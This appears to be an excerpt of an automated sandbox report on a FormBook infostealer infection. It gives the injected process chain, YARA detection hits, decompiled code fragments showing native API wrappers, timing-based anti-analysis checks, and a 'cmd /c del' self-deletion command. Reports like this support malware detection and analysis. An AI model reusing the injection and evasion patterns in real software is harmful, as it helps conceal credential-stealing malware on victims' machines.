                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:2
                                        Start time:09:48:49
                                        Start date:13/07/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625'664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:3
                                        Start time:09:48:53
                                        Start date:13/07/2023
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\svchost.exe
                                        Imagebase:0xdd0000
                                        File size:44'520 bytes
                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:4
                                        Start time:09:48:54
                                        Start date:13/07/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff69fe90000
                                        File size:3'933'184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.906043086.000000000756C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high

                                        Target ID:7
                                        Start time:09:49:10
                                        Start date:13/07/2023
                                        Path:C:\Windows\SysWOW64\cmmon32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                        Imagebase:0xdd0000
                                        File size:36'864 bytes
                                        MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:8
                                        Start time:09:49:14
                                        Start date:13/07/2023
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                        Imagebase:0xb0000
                                        File size:232'960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        Target ID:9
                                        Start time:09:49:15
                                        Start date:13/07/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625'664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                          Execution Graph

                                          Execution Coverage:16.9%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:12
                                          Total number of Limit Nodes:0

                                          Callgraph


                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399511867.00007FFBAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac380000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d0b2b1f5fd1735ae499d87bd829b5c3812c701e8d933f66075de44f600d0514f
                                          • Instruction ID: 49f39fdbe66ad20eb11bbdf26fd3d4cac0ff430cd1613ae6012c23e21a2b4396
                                          • Opcode Fuzzy Hash: d0b2b1f5fd1735ae499d87bd829b5c3812c701e8d933f66075de44f600d0514f
                                          • Instruction Fuzzy Hash: 1B6218B190EF894FE797973898595B57BE1EF86220B0801FBD84DC71A3D928EC06C395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399511867.00007FFBAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac380000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jt#$jt#
                                          • API String ID: 0-902709449
                                          • Opcode ID: a4f679ce81e086c1fe9e68b68b373c7a45f2bee996f194fda4f75f256c9ccef0
                                          • Instruction ID: 00c15cc8640c6c2f29329996f1807d110c3d8d2af79e24990935e87fc8532a34
                                          • Opcode Fuzzy Hash: a4f679ce81e086c1fe9e68b68b373c7a45f2bee996f194fda4f75f256c9ccef0
                                          • Instruction Fuzzy Hash: 6B4119E2B0ED5A0FFBA6D63C9455AF963D1EF44720B08017AD84EC31D2DD28EC054399
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399371540.00007FFBAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC2B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac2b0000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: eeb6d813cbbf3de8023c99d6feaf2d6505a14c9bc4909965def0b4bf97d6088f
                                          • Instruction ID: 3709dd43352562e5edacc15c9b0fec5386e94da63f3223d6eaca7db5c3901c7f
                                          • Opcode Fuzzy Hash: eeb6d813cbbf3de8023c99d6feaf2d6505a14c9bc4909965def0b4bf97d6088f
                                          • Instruction Fuzzy Hash: 14D19571918B8D4FDB65EF28C89A7E977D1FB58310F00422EDC4EC7295DE74A9418B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399371540.00007FFBAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC2B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac2b0000_powershell.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 58203cf197c0dc2159e6cb913134c99d8ce361a01f8a80f2564058120d469cb1
                                          • Instruction ID: b2c656bdaad2308de82b97e748d44af6c974831e12513d57d27edf8fe4637ed6
                                          • Opcode Fuzzy Hash: 58203cf197c0dc2159e6cb913134c99d8ce361a01f8a80f2564058120d469cb1
                                          • Instruction Fuzzy Hash: 8D41E67191CB1C4FDB18EF9998456F97BE0EB95311F00426FE44AD3252CE74A846CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399371540.00007FFBAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC2B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac2b0000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 9991abe5afb07461934d0e0ac11a14e6ac02e354524dade890c58971f3753b06
                                          • Instruction ID: 78031759fa1a51546002d2566e26fb6f3dff3546236556e146ee4ff7eb75bf06
                                          • Opcode Fuzzy Hash: 9991abe5afb07461934d0e0ac11a14e6ac02e354524dade890c58971f3753b06
                                          • Instruction Fuzzy Hash: 60312871C0CB184FDB29EFA898496F97BE0EB55321F04423FD04AD3292DF74A44A8791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 102 7ffbac2b3e3d-7ffbac2b3e49 103 7ffbac2b3e54-7ffbac2b3e63 102->103 104 7ffbac2b3e4b-7ffbac2b3e53 102->104 105 7ffbac2b3e65-7ffbac2b3e6d 103->105 106 7ffbac2b3e6e-7ffbac2b3f04 ResumeThread 103->106 104->103 105->106 111 7ffbac2b3f06 106->111 112 7ffbac2b3f0c-7ffbac2b3f31 106->112 111->112
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399371540.00007FFBAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC2B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac2b0000_powershell.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 794bb1f1d963e6d09eb480e56da070ed666276f0fc2d96879229f37d25c928d4
                                          • Instruction ID: f820a98479350abf5ac7b17bfe8567540a2318755d8463499466d1771ad5c50c
                                          • Opcode Fuzzy Hash: 794bb1f1d963e6d09eb480e56da070ed666276f0fc2d96879229f37d25c928d4
                                          • Instruction Fuzzy Hash: 7F31167190D7884FDB1ADB6888566E97FB0EF57320F0442AFD049C72A7CA78A406CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:4%
                                          Dynamic/Decrypted Code Coverage:2.8%
                                          Signature Coverage:5.9%
                                          Total number of Nodes:545
                                          Total number of Limit Nodes:68

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 41a3fa-41a449 call 41af50 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !JA$bMA$bMA
                                          • API String ID: 2738559852-4222312340
                                          • Opcode ID: ef10a2a631385ec49bcfd22315def20dce603307228e914972775937aa5eacd3
                                          • Instruction ID: 3a3a700734210796995d75502dc5a40e7190ddaea329ae01a61bcc1ce3973a29
                                          • Opcode Fuzzy Hash: ef10a2a631385ec49bcfd22315def20dce603307228e914972775937aa5eacd3
                                          • Instruction Fuzzy Hash: CFF0F4B2200108AFCB14CFA9CC81EEB77A9EF8C354F158249BA1DA7241D634E815CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3 41a400-41a416 4 41a41c-41a449 NtReadFile 3->4 5 41a417 call 41af50 3->5 5->4
                                          C-Code - Quality: 37%
                                          			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                          				void* _t18;
                                          				void* _t27;
                                          				intOrPtr* _t28;
                                          
                                          				_t13 = _a4;
                                          				_t28 = _a4 + 0xc48;
                                          				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                          				_t4 =  &_a40; // 0x414a21
                                          				_t6 =  &_a32; // 0x414d62
                                          				_t12 =  &_a8; // 0x414d62
                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                          				return _t18;
                                          			}







                                          APIs
                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !JA$bMA$bMA
                                          • API String ID: 2738559852-4222312340
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 234 40ace0-40acfc 235 40ad04-40ad09 234->235 236 40acff call 41cc40 234->236 237 40ad0b-40ad0e 235->237 238 40ad0f-40ad1d call 41d060 235->238 236->235 241 40ad2d-40ad3e call 41b490 238->241 242 40ad1f-40ad2a call 41d2e0 238->242 247 40ad40-40ad54 LdrLoadDll 241->247 248 40ad57-40ad5a 241->248 242->241 247->248
                                          C-Code - Quality: 100%
                                          			E0040ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
                                          				char* _v8;
                                          				struct _EXCEPTION_RECORD _v12;
                                          				struct _OBJDIR_INFORMATION _v16;
                                          				char _v536;
                                          				void* _t15;
                                          				struct _OBJDIR_INFORMATION _t17;
                                          				struct _OBJDIR_INFORMATION _t18;
                                          				void* _t30;
                                          				void* _t31;
                                          				void* _t32;
                                          
                                          				_v8 =  &_v536;
                                          				_t15 = E0041CC40(_a8,  &_v12, 0x104, _a8);
                                          				_t31 = _t30 + 0xc;
                                          				if(_t15 != 0) {
                                          					_t17 = E0041D060(__eflags, _v8);
                                          					_t32 = _t31 + 4;
                                          					__eflags = _t17;
                                          					if(_t17 != 0) {
                                          						E0041D2E0( &_v12, 0);
                                          						_t32 = _t32 + 8;
                                          					}
                                          					_t18 = E0041B490(_v8);
                                          					_v16 = _t18;
                                          					__eflags = _t18;
                                          					if(_t18 == 0) {
                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                          						return _v16;
                                          					}
                                          					return _t18;
                                          				} else {
                                          					return _t15;
                                          				}
                                          			}














                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 249 41a34a-41a3a1 call 41af50 NtCreateFile
                                          C-Code - Quality: 79%
                                          			E0041A34A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                          				long _t23;
                                          				void* _t33;
                                          
                                          				asm("sbb al, [esi-0x74aae469]");
                                          				_t17 = _a4;
                                          				_t3 = _t17 + 0xc40; // 0xc40
                                          				E0041AF50(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                          				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                          				return _t23;
                                          			}






                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 252 41a350-41a366 253 41a36c-41a3a1 NtCreateFile 252->253 254 41a367 call 41af50 252->254 254->253
                                          C-Code - Quality: 100%
                                          			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                          				long _t21;
                                          				void* _t31;
                                          
                                          				_t3 = _a4 + 0xc40; // 0xc40
                                          				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                          				return _t21;
                                          			}






                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 255 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                          C-Code - Quality: 100%
                                          			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                          				long _t14;
                                          				void* _t21;
                                          
                                          				_t3 = _a4 + 0xc60; // 0xca0
                                          				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                          				return _t14;
                                          			}






                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E0041A47D(void* __eax, intOrPtr _a4, void* _a8) {
                                          				long _t10;
                                          				void* _t13;
                                          
                                          				asm("out dx, al");
                                          				_t7 = _a4;
                                          				_t2 = _t7 + 0x10; // 0x300
                                          				_t3 = _t7 + 0xc50; // 0x40a933
                                          				E0041AF50(_t13, _a4, _t3,  *_t2, 0, 0x2c);
                                          				_t10 = NtClose(_a8); // executed
                                          				return _t10;
                                          			}






                                          APIs
                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A480(intOrPtr _a4, void* _a8) {
                                          				long _t8;
                                          				void* _t11;
                                          
                                          				_t5 = _a4;
                                          				_t2 = _t5 + 0x10; // 0x300
                                          				_t3 = _t5 + 0xc50; // 0x40a933
                                          				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                          				_t8 = NtClose(_a8); // executed
                                          				return _t8;
                                          			}






                                          APIs
                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%


                                          C-Code - Quality: 93%
                                          			E00409AA0(intOrPtr* _a4) {
                                          				intOrPtr _v8;
                                          				char _v24;
                                          				char _v284;
                                          				char _v804;
                                          				char _v840;
                                          				void* _t24;
                                          				void* _t31;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t39;
                                          				void* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t53;
                                          				void* _t54;
                                          				void* _t55;
                                          				void* _t56;
                                          
                                          				_t52 = _a4;
                                          				_t39 = 0; // executed
                                          				_t24 = E00407EA0(_t52,  &_v24); // executed
                                          				_t54 = _t53 + 8;
                                          				if(_t24 != 0) {
                                          					E004080B0( &_v24,  &_v840);
                                          					_t55 = _t54 + 8;
                                          					do {
                                          						E0041BE00( &_v284, 0x104);
                                          						E0041C470( &_v284,  &_v804);
                                          						_t56 = _t55 + 0x10;
                                          						_t50 = 0x4f;
                                          						while(1) {
                                          							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
                                          							_t56 = _t56 + 0x10;
                                          							if(_t31 != 0) {
                                          								break;
                                          							}
                                          							_t50 = _t50 + 1;
                                          							if(_t50 <= 0x62) {
                                          								continue;
                                          							} else {
                                          							}
                                          							goto L8;
                                          						}
                                          						_t9 = _t52 + 0x14; // 0xffffe055
                                          						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                          						_t39 = 1;
                                          						L8:
                                          						_t33 = E004080E0( &_v24,  &_v840);
                                          						_t55 = _t56 + 8;
                                          					} while (_t33 != 0 && _t39 == 0);
                                          					_t34 = E00408160(_t52,  &_v24); // executed
                                          					if(_t39 == 0) {
                                          						asm("rdtsc");
                                          						asm("rdtsc");
                                          						_v8 = _t34 - 0 + _t34;
                                          						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                          					}
                                          					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                          					_t20 = _t52 + 0x31; // 0x5608758b
